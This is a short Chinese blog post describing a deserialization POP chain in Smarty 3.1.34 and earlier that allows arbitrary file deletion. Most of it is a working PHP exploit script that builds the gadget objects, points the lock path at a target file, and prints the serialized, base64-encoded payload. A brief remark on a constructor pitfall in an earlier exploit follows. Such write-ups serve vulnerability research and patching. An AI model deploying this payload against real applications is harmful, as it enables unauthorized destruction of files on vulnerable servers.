zoukankan      html  css  js  c++  java
  • Smarty 3.1.34 反序列化POP链(任意文件删除)

    Smarty <= 3.1.34,存在任意文件删除的POP链。

    Exp:

    <?php
    class Smarty_Internal_Template
    {
        public $smarty = null;
        public function __construct()
        {
            $this->smarty = new Smarty;
            $this->cached = new Smarty_Template_Cached;
        }
    }
    class Smarty
    {
        public $cache_locking = true;
    }
    class Smarty_Template_Cached
    {
        public $is_locked = true;
        public $handler = null;
        public $lock_id = null;
        public function __construct()
        {
            $this->handler = new Smarty_Internal_CacheResource_File;
            $this->lock_id = './1.txt';
        }
    }
    class Smarty_Internal_CacheResource_File
    {
    }
    $obj = base64_encode(serialize(new Smarty_Internal_Template));
    echo($obj);
    

      流程还是比较简单,没遇到什么坑。

      参考文章:https://xz.aliyun.com/t/6929

    开始一直没明白原文中2楼回复的坑是啥,感觉没啥道理。

    仔细看了下原文作者的exp,原来发现他指的是作者exp中的坑,而不是程序代码的坑:

    new的时候,肯定会调用__construct方法,给你初始化掉上面设置的$lock_id属性。

  • 相关阅读:
    [luogu3334]抛硬币
    [luogu3706]硬币游戏
    [luogu4548]歌唱王国
    [hdu4652]Dice
    [atAGC013F]Two Faced Cards
    [atAGC045F]Division into Multiples
    [atAGC045E]Fragile Balls
    [atAGC045D]Lamps and Buttons
    [luogu5574]任务分配问题
    [luogu4331]数字序列
  • 原文地址:https://www.cnblogs.com/xiaozhiru/p/12462402.html
Copyright © 2011-2022 走看看